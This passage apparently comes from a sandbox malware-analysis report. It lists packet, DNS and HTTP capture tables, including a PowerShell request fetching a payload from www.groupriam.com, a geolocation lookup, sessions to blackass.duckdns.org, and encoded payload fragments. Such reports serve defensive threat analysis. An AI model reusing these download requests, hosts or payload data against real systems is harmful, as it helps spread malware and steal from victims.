                                                              Oct 21, 2024 17:07:53.393403053 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.393434048 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430397987 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430423021 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430491924 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430506945 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430551052 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430557013 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430562019 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430592060 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430598974 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430609941 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430643082 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430768967 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430788040 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430815935 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430820942 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430844069 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430859089 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430896044 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430938959 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.430943012 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430960894 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.430975914 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.431013107 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.431288958 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.431305885 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:56.010036945 CEST4997565253192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.015389919 CEST6525349975193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:56.015531063 CEST4997565253192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.018934965 CEST4997565253192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.024250031 CEST6525349975193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:56.585072041 CEST6525349975193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:56.585177898 CEST4997565253192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.585289955 CEST4997565253192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.586647987 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.590655088 CEST6525349975193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:56.592288017 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:56.592386007 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.599963903 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:56.605415106 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:57.491276026 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:57.542507887 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:57.725734949 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:57.729995012 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:57.735580921 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:57.735688925 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:57.741523981 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:58.178098917 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:58.179169893 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:58.184544086 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:58.462845087 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:07:58.505141020 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:58.537101984 CEST4997780192.168.2.11178.237.33.50
                                                              Oct 21, 2024 17:07:58.544240952 CEST8049977178.237.33.50192.168.2.11
                                                              Oct 21, 2024 17:07:58.544419050 CEST4997780192.168.2.11178.237.33.50
                                                              Oct 21, 2024 17:07:58.544473886 CEST4997780192.168.2.11178.237.33.50
                                                              Oct 21, 2024 17:07:58.549829960 CEST8049977178.237.33.50192.168.2.11
                                                              Oct 21, 2024 17:07:59.126180887 CEST8049977178.237.33.50192.168.2.11
                                                              Oct 21, 2024 17:07:59.126300097 CEST4997780192.168.2.11178.237.33.50
                                                              Oct 21, 2024 17:07:59.147542000 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:07:59.154412985 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:08:00.203927994 CEST8049977178.237.33.50192.168.2.11
                                                              Oct 21, 2024 17:08:00.203979015 CEST4997780192.168.2.11178.237.33.50
                                                              Oct 21, 2024 17:08:18.503467083 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:08:18.505001068 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:08:18.511243105 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:08:48.554692984 CEST5324149976193.187.91.214192.168.2.11
                                                              Oct 21, 2024 17:08:48.555994987 CEST4997653241192.168.2.11193.187.91.214
                                                              Oct 21, 2024 17:08:48.564260006 CEST5324149976193.187.91.214192.168.2.11

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 21, 2024 17:06:59.984863043 CEST5093453192.168.2.111.1.1.1
                                                              Oct 21, 2024 17:07:00.000509977 CEST53509341.1.1.1192.168.2.11
                                                              Oct 21, 2024 17:07:03.225142002 CEST6433753192.168.2.111.1.1.1
                                                              Oct 21, 2024 17:07:03.414567947 CEST53643371.1.1.1192.168.2.11
                                                              Oct 21, 2024 17:07:55.139040947 CEST6160653192.168.2.111.1.1.1
                                                              Oct 21, 2024 17:07:56.008833885 CEST53616061.1.1.1192.168.2.11
                                                              Oct 21, 2024 17:07:58.525832891 CEST4932253192.168.2.111.1.1.1
                                                              Oct 21, 2024 17:07:58.536153078 CEST53493221.1.1.1192.168.2.11

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 21, 2024 17:06:59.984863043 CEST192.168.2.111.1.1.10x3049Standard query (0)gormezl_6777.6777.6777.677eA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:03.225142002 CEST192.168.2.111.1.1.10x7b1dStandard query (0)www.groupriam.comA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:55.139040947 CEST192.168.2.111.1.1.10xd6b2Standard query (0)blackass.duckdns.orgA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:58.525832891 CEST192.168.2.111.1.1.10x8a05Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 21, 2024 17:06:56.146229982 CEST1.1.1.1192.168.2.110x40dbNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Oct 21, 2024 17:06:56.146229982 CEST1.1.1.1192.168.2.110x40dbNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:00.000509977 CEST1.1.1.1192.168.2.110x3049Name error (3)gormezl_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:03.414567947 CEST1.1.1.1192.168.2.110x7b1dNo error (0)www.groupriam.comgroupriam.comCNAME (Canonical name)IN (0x0001)false
                                                              Oct 21, 2024 17:07:03.414567947 CEST1.1.1.1192.168.2.110x7b1dNo error (0)groupriam.com199.103.62.205A (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:56.008833885 CEST1.1.1.1192.168.2.110xd6b2No error (0)blackass.duckdns.org193.187.91.214A (IP address)IN (0x0001)false
                                                              Oct 21, 2024 17:07:58.536153078 CEST1.1.1.1192.168.2.110x8a05No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.groupriam.com
                                                              • geoplugin.net

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1149977178.237.33.50807092C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 21, 2024 17:07:58.544473886 CEST71OUTGET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
                                                              Oct 21, 2024 17:07:59.126180887 CEST1168INHTTP/1.1 200 OK
                                                              date: Mon, 21 Oct 2024 15:07:59 GMT
                                                              server: Apache
                                                              content-length: 960
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1149736199.103.62.2054437972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-21 15:07:03 UTC181OUTGET /Mandschauvinisme.snp HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: www.groupriam.com
                                                              Connection: Keep-Alive
                                                              2024-10-21 15:07:04 UTC422INHTTP/1.1 200 OK
                                                              Connection: close
                                                              content-type: application/octet-stream
                                                              last-modified: Mon, 21 Oct 2024 09:19:43 GMT
                                                              accept-ranges: bytes
                                                              content-length: 499656
                                                              date: Mon, 21 Oct 2024 15:07:03 GMT
                                                              server: LiteSpeed
                                                              vary: User-Agent
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 63 51 47 62 63 51 47 62 75 37 4f 4a 46 51 42 78 41 5a 76 72 41 70 74 36 41 31 77 6b 42 48 45 42 6d 2b 73 43 73 41 61 35 64 71 7a 6c 39 58 45 42 6d 2b 73 43 4f 54 61 42 77 61 50 46 58 73 74 78 41 5a 74 78 41 5a 75 42 36 52 6c 79 52 4d 48 72 41 74 76 6a 36 77 4b 55 7a 33 45 42 6d 33 45 42 6d 37 70 45 6c 47 4f 4b 63 51 47 62 63 51 47 62 36 77 4a 32 69 33 45 42 6d 7a 48 4b 36 77 4c 31 62 48 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 6f 76 48 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 55 72 62 72 41 6b 72 4d 67 66 6b 4e 69 59 6f 46 66 4d 76 72 41 68 77 50 36 77 4b 37 2b 49 74 45 4a 41 54 72 41 75 73 59 36 77 49 55 41 6f 6e 44 63 51 47 62 63 51 47 62 67 63 4f 55 66 75 41 42 36 77 4c 73 64 75 73 43 48 49 61 36 50 4b 61 77 6d 58 45 42 6d 33 45 42 6d 34 48
                                                              Data Ascii: cQGbcQGbu7OJFQBxAZvrApt6A1wkBHEBm+sCsAa5dqzl9XEBm+sCOTaBwaPFXstxAZtxAZuB6RlyRMHrAtvj6wKUz3EBm3EBm7pElGOKcQGbcQGb6wJ2i3EBmzHK6wL1bHEBm4kUC3EBm+sCovHR4nEBm3EBm4PBBOsCUrbrAkrMgfkNiYoFfMvrAhwP6wK7+ItEJATrAusY6wIUAonDcQGbcQGbgcOUfuAB6wLsdusCHIa6PKawmXEBm3EBm4H
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 79 2b 54 49 61 74 53 38 54 58 36 77 61 69 7a 2f 6e 56 62 6e 67 45 47 76 50 6c 6a 73 34 36 4a 34 38 2b 48 35 43 57 48 44 33 45 65 72 32 2b 4f 46 45 48 67 36 4b 6c 51 62 36 2b 6f 56 70 34 73 64 57 4f 38 56 65 68 62 31 65 34 55 4d 5a 41 33 62 39 4f 36 72 4d 7a 70 79 5a 4f 38 31 74 56 54 6a 4e 62 56 55 34 7a 57 31 56 4f 4d 31 74 56 54 6a 4e 62 56 55 34 7a 57 31 56 4f 4d 31 74 56 52 45 50 39 65 65 6f 32 33 6a 36 71 62 4f 6f 42 52 69 32 38 67 4f 31 6d 67 30 6b 69 76 4b 4b 61 46 69 77 79 58 31 6e 75 33 6e 79 47 72 58 74 47 5a 2b 73 58 59 6b 34 56 4d 38 59 30 32 44 4c 4e 70 7a 50 36 79 49 51 43 4b 35 4f 4e 31 71 43 30 5a 32 36 6c 5a 67 37 69 56 2f 58 62 77 62 46 61 7a 64 62 44 57 6f 48 47 2f 54 62 53 68 72 63 74 46 72 4e 4c 56 55 44 62 44 32 53 53 39 6a 43 69 37
                                                              Data Ascii: y+TIatS8TX6waiz/nVbngEGvPljs46J48+H5CWHD3Eer2+OFEHg6KlQb6+oVp4sdWO8Vehb1e4UMZA3b9O6rMzpyZO81tVTjNbVU4zW1VOM1tVTjNbVU4zW1VOM1tVREP9eeo23j6qbOoBRi28gO1mg0kivKKaFiwyX1nu3nyGrXtGZ+sXYk4VM8Y02DLNpzP6yIQCK5ON1qC0Z26lZg7iV/XbwbFazdbDWoHG/TbShrctFrNLVUDbD2SS9jCi7
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 67 50 6c 57 34 7a 58 75 76 32 69 5a 4e 4f 47 76 4e 37 56 55 6e 34 42 78 45 62 47 50 6a 52 30 68 6e 44 53 6d 6b 4b 45 34 63 57 4c 66 2b 73 32 61 75 54 53 2b 58 51 31 44 54 47 4c 33 64 4c 37 44 4c 44 78 65 36 6d 72 6a 2b 57 6b 71 48 78 68 46 54 6b 37 56 52 41 75 5a 4b 36 6a 6c 37 63 2b 62 6c 33 73 30 70 68 44 33 73 47 4b 63 5a 6f 6f 4b 52 69 64 68 77 2b 36 31 73 72 6b 4f 41 42 6a 68 4e 62 56 62 5a 6d 68 4d 71 78 78 6c 44 64 39 54 56 4d 56 52 48 78 6e 45 70 2b 61 6b 73 48 70 2f 76 4c 33 61 66 46 72 72 71 66 54 6e 72 37 33 45 4c 36 73 6f 5a 47 47 63 31 74 43 57 42 58 62 36 4f 31 65 30 79 5a 6e 57 48 31 4f 51 44 69 41 36 64 4e 69 53 30 59 52 63 41 39 37 75 67 4f 6f 46 57 30 36 30 75 32 49 4b 55 74 37 32 39 4e 55 6b 54 2f 54 4d 53 37 52 79 6a 46 6e 39 54 39 55
                                                              Data Ascii: gPlW4zXuv2iZNOGvN7VUn4BxEbGPjR0hnDSmkKE4cWLf+s2auTS+XQ1DTGL3dL7DLDxe6mrj+WkqHxhFTk7VRAuZK6jl7c+bl3s0phD3sGKcZooKRidhw+61srkOABjhNbVbZmhMqxxlDd9TVMVRHxnEp+aksHp/vL3afFrrqfTnr73EL6soZGGc1tCWBXb6O1e0yZnWH1OQDiA6dNiS0YRcA97ugOoFW060u2IKUt729NUkT/TMS7RyjFn9T9U
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 30 6e 36 4e 51 76 68 61 73 61 4b 34 42 54 59 64 53 56 56 74 53 43 46 31 31 5a 41 39 4a 55 6b 74 70 6a 51 6e 36 79 71 32 6e 51 5a 6a 43 79 44 42 64 38 7a 56 46 59 57 50 31 56 4f 30 51 35 57 36 4a 67 54 56 46 5a 4a 61 49 30 6d 30 51 78 5a 48 6b 6d 66 64 2f 61 47 31 43 56 33 36 77 32 55 32 78 39 72 35 47 67 35 37 66 50 76 79 52 5a 4b 55 6c 55 41 70 4b 46 32 33 51 48 72 64 47 56 70 49 6a 4e 48 36 6e 6f 55 6e 30 45 48 4f 74 5a 75 78 6e 2b 74 62 34 2b 70 54 56 4f 4d 31 74 56 54 6a 4e 62 56 55 34 7a 57 31 56 4f 4d 31 74 56 54 6a 4e 62 56 55 34 7a 57 31 56 4f 4d 31 45 51 49 33 38 47 51 44 38 75 78 35 64 74 74 68 61 72 67 57 34 61 5a 70 50 50 74 43 6a 61 65 72 46 55 6c 46 33 72 44 76 54 61 73 70 52 6e 4e 41 69 73 43 4c 6e 74 35 4b 35 50 78 36 35 75 75 50 35 2b 35
                                                              Data Ascii: 0n6NQvhasaK4BTYdSVVtSCF11ZA9JUktpjQn6yq2nQZjCyDBd8zVFYWP1VO0Q5W6JgTVFZJaI0m0QxZHkmfd/aG1CV36w2U2x9r5Gg57fPvyRZKUlUApKF23QHrdGVpIjNH6noUn0EHOtZuxn+tb4+pTVOM1tVTjNbVU4zW1VOM1tVTjNbVU4zW1VOM1EQI38GQD8ux5dtthargW4aZpPPtCjaerFUlF3rDvTaspRnNAisCLnt5K5Px65uuP5+5
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 64 42 66 7a 6a 52 67 2f 53 53 5a 4a 38 41 54 33 74 45 2f 32 2b 36 4b 4f 43 39 72 76 37 44 78 33 46 69 78 47 59 67 47 52 4b 30 75 61 61 39 58 58 45 51 64 71 59 47 63 30 65 4d 64 73 41 4f 46 39 4f 72 52 4e 6b 54 57 31 56 4f 4d 31 74 56 54 6a 4e 62 56 55 34 7a 57 31 56 4f 4d 31 74 56 54 6a 4e 62 56 55 34 7a 57 31 56 46 41 31 77 4e 67 71 61 41 66 79 4d 6f 6e 6e 6b 63 2f 4e 33 4b 38 71 58 58 2b 43 59 43 63 30 59 4d 63 62 74 4d 69 7a 74 49 46 77 61 31 63 70 6b 57 49 78 6b 63 43 70 53 63 30 45 57 35 64 5a 4f 74 51 59 49 41 63 4b 30 59 41 73 77 4c 44 6e 33 66 76 67 6b 50 36 56 4f 53 78 4b 2b 41 6d 41 65 4e 6c 36 48 4b 34 4f 41 2b 58 56 69 46 5a 76 7a 31 58 59 45 33 44 33 36 42 6b 39 45 6a 43 4a 51 79 74 51 4a 53 46 37 39 4b 62 64 33 2b 72 74 76 41 4e 77 73 56 54
                                                              Data Ascii: dBfzjRg/SSZJ8AT3tE/2+6KOC9rv7Dx3FixGYgGRK0uaa9XXEQdqYGc0eMdsAOF9OrRNkTW1VOM1tVTjNbVU4zW1VOM1tVTjNbVU4zW1VFA1wNgqaAfyMonnkc/N3K8qXX+CYCc0YMcbtMiztIFwa1cpkWIxkcCpSc0EW5dZOtQYIAcK0YAswLDn3fvgkP6VOSxK+AmAeNl6HK4OA+XViFZvz1XYE3D36Bk9EjCJQytQJSF79Kbd3+rtvANwsVT
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 46 38 76 66 42 72 53 47 2f 34 74 76 38 74 58 51 52 67 31 79 79 6c 4e 43 6c 53 6a 65 4d 49 56 69 4e 6a 37 6b 2b 43 56 79 30 64 6f 33 74 56 51 59 59 70 48 2f 59 70 69 4d 56 75 4d 31 74 73 57 64 69 44 54 68 32 6a 65 31 56 4b 58 71 53 50 6a 62 77 4e 50 52 4f 37 51 77 62 65 45 31 74 52 45 46 6b 67 73 58 48 4c 69 4d 56 75 4d 31 77 4b 4f 67 38 72 5a 72 34 68 50 54 31 64 41 57 48 38 6e 41 55 7a 43 57 59 6a 59 31 65 76 76 49 4e 48 39 6a 79 6a 67 4c 32 76 63 38 34 65 6b 33 74 56 52 64 59 45 2f 67 31 37 52 44 33 33 76 74 36 74 55 6c 76 2b 5a 4c 51 46 4d 77 6c 57 4c 62 30 65 4a 6f 4f 37 53 6e 61 49 43 2f 56 75 4d 31 51 35 43 62 55 34 79 63 4a 44 61 67 51 6e 75 79 4e 47 66 45 61 68 6e 55 59 67 61 30 34 50 2b 34 4d 4a 31 69 42 76 6b 31 4b 2b 4c 54 30 54 4f 30 64 74 4b
                                                              Data Ascii: F8vfBrSG/4tv8tXQRg1yylNClSjeMIViNj7k+CVy0do3tVQYYpH/YpiMVuM1tsWdiDTh2je1VKXqSPjbwNPRO7QwbeE1tREFkgsXHLiMVuM1wKOg8rZr4hPT1dAWH8nAUzCWYjY1evvINH9jyjgL2vc84ek3tVRdYE/g17RD33vt6tUlv+ZLQFMwlWLb0eJoO7SnaIC/VuM1Q5CbU4ycJDagQnuyNGfEahnUYga04P+4MJ1iBvk1K+LT0TO0dtK
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 58 6a 52 6e 54 43 4a 30 4d 34 57 63 30 48 70 69 42 71 71 4a 4e 57 4f 4d 68 78 54 32 58 65 50 78 61 33 4c 52 4a 54 53 31 56 48 56 6e 56 57 6c 69 67 48 4e 56 34 7a 57 52 51 61 39 58 4e 4b 30 36 50 70 30 4c 59 6f 42 7a 56 65 4d 31 38 39 68 46 44 6a 47 45 59 6f 42 7a 56 65 4d 31 51 70 2f 70 55 54 47 37 6f 4d 6f 34 6b 75 49 31 74 53 45 55 73 56 6b 58 59 38 37 56 6b 2b 44 50 66 56 78 57 73 55 6e 56 79 42 59 36 74 75 5a 54 6a 49 35 69 4e 6a 49 4b 30 77 4d 78 6c 57 49 47 4b 7a 35 52 58 54 43 66 4a 4c 42 79 56 65 4d 31 35 37 74 72 6d 44 54 35 4a 44 53 31 56 42 39 61 78 31 46 69 53 4d 56 6d 2b 54 57 31 57 32 66 32 70 46 44 6a 74 41 43 54 34 6a 57 31 44 6a 55 51 32 39 56 4f 38 72 52 55 34 7a 77 63 5a 79 56 6d 44 74 44 6a 4e 62 58 56 47 44 77 69 77 36 67 36 4f 6e 50
                                                              Data Ascii: XjRnTCJ0M4Wc0HpiBqqJNWOMhxT2XePxa3LRJTS1VHVnVWligHNV4zWRQa9XNK06Pp0LYoBzVeM189hFDjGEYoBzVeM1Qp/pUTG7oMo4kuI1tSEUsVkXY87Vk+DPfVxWsUnVyBY6tuZTjI5iNjIK0wMxlWIGKz5RXTCfJLByVeM157trmDT5JDS1VB9ax1FiSMVm+TW1W2f2pFDjtACT4jW1DjUQ29VO8rRU4zwcZyVmDtDjNbXVGDwiw6g6OnP
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 32 61 6f 34 37 2b 61 2b 46 58 65 4b 4d 6c 53 71 31 6f 74 72 51 4a 6d 7a 74 73 69 68 43 58 34 31 50 6d 72 4c 44 61 65 4d 75 59 64 6b 34 75 74 78 41 4b 50 5a 59 74 6f 43 2f 48 32 57 4e 4b 50 49 73 54 66 2b 59 73 4a 46 58 52 5a 32 35 4d 68 71 31 4c 52 74 66 67 31 75 4b 63 44 39 33 64 68 58 4f 41 78 77 56 65 52 5a 31 50 59 52 7a 52 32 33 34 63 50 55 36 4a 77 6a 32 50 2f 44 36 72 53 47 46 77 4b 33 6e 33 42 79 6f 76 44 43 2b 47 73 6f 6d 6c 42 73 75 71 42 59 41 72 71 5a 5a 4e 41 45 62 4f 54 74 73 54 57 31 56 47 4c 4d 55 42 38 6d 4a 62 72 62 76 64 57 32 56 4c 70 71 50 74 6d 37 4e 37 56 55 73 6f 79 54 6b 34 74 4d 4e 4c 31 4f 68 61 4d 64 59 73 53 45 38 52 31 36 4e 4a 56 70 2b 45 54 64 59 73 52 6e 31 58 30 38 35 38 68 71 31 37 52 65 66 6c 4f 4d 67 70 6b 78 78 33 35
                                                              Data Ascii: 2ao47+a+FXeKMlSq1otrQJmztsihCX41PmrLDaeMuYdk4utxAKPZYtoC/H2WNKPIsTf+YsJFXRZ25Mhq1LRtfg1uKcD93dhXOAxwVeRZ1PYRzR234cPU6Jwj2P/D6rSGFwK3n3ByovDC+GsomlBsuqBYArqZZNAEbOTtsTW1VGLMUB8mJbrbvdW2VLpqPtm7N7VUsoyTk4tMNL1OhaMdYsSE8R16NJVp+ETdYsRn1X0858hq17ReflOMgpkxx35
                                                              2024-10-21 15:07:04 UTC16384INData Raw: 77 58 43 76 57 4e 74 75 30 44 42 71 4e 43 6d 66 32 4b 4e 55 34 7a 6f 78 53 4b 58 4b 53 67 6f 4c 4e 51 6c 58 34 32 49 4b 51 32 33 7a 32 74 55 4d 4c 75 7a 6c 67 72 52 43 7a 2f 45 67 75 39 33 73 71 6e 34 6d 35 61 6e 79 30 6b 79 4d 66 4e 66 68 4a 47 78 6b 4a 66 72 41 35 4f 6b 6b 56 30 42 78 56 68 7a 64 55 7a 63 43 53 67 2b 75 39 68 78 33 70 5a 73 6f 6b 4e 65 58 46 76 62 58 6c 58 59 69 65 56 34 4c 74 49 70 36 61 2f 4b 65 4e 4b 4e 31 73 65 4a 52 59 76 49 52 32 56 70 6b 50 45 50 53 39 50 32 73 6e 58 4e 37 64 64 44 53 62 47 71 70 46 44 6a 41 43 6c 4d 36 50 4a 4c 73 51 76 38 44 33 34 36 4d 63 35 69 5a 53 73 76 56 33 73 47 6f 65 68 2b 58 43 34 36 53 4e 62 78 52 50 6b 6e 54 4e 62 56 55 61 47 36 35 33 37 67 68 35 4f 32 71 62 61 34 4c 59 73 51 70 2b 61 57 71 4e 4b 56
                                                              Data Ascii: wXCvWNtu0DBqNCmf2KNU4zoxSKXKSgoLNQlX42IKQ23z2tUMLuzlgrRCz/Egu93sqn4m5any0kyMfNfhJGxkJfrA5OkkV0BxVhzdUzcCSg+u9hx3pZsokNeXFvbXlXYieV4LtIp6a/KeNKN1seJRYvIR2VpkPEPS9P2snXN7ddDSbGqpFDjAClM6PJLsQv8D346Mc5iZSsvV3sGoeh+XC46SNbxRPknTNbVUaG6537gh5O2qba4LYsQp+aWqNKV
